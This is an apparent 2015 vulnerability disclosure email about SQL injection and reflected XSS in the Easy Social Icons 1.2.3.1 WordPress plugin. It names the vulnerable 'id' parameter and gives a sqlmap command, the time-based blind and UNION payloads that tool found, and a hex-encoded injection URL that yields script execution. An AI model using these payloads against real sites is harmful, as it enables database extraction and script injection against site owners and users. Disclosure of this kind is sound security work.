Subject: SQL injection (+XSS) in Easy Social Icons 1.2.3.1
Date: Wed, 22 Jul 2015 14:49:37 +0200

Hello,

Plugin: Easy Social Icons 1.2.3.1 https://wordpress.org/plugins/easy-social-icons/

Authenticated administrators can execute arbitrary SQL commands (there is no CSRF protection).

1. SQL injection ((cnss_social_icon_add_fn))

Method: GET
Url: http://localhost/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1
Vulnerable parameter: id

Example PHP callstack:
cnss_social_icon_add_fn   [/easy-social-icons/easy-social-icons.php:563]
wpdb::get_results

Verification:

sqlmap --cookie "" --dbms mysql -p id -u "http://localhost/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1"

...
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: page=cnss_social_icon_add&mode=edit&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BirD)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: page=cnss_social_icon_add&mode=edit&id=1 UNION ALL SELECT CONCAT(0x71787a7671,0x70494a446c6e4368424c,0x7170716271),NULL,NULL,NULL,NULL,NULL,NULL-- 
...

Please note that this SQL injection can lead to reflected XSS (bypassing browser anti-xss filters , like Chrome XSS auditor)

Example: http://localhost/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=-1+union+select+1%2C0x223e3c7363726970743e616c6572742831293b3c2f7363726970743e%2C3%2C4%2C5%2C6%2C7

-- 
Pozdrawiam,
Marcin Probola,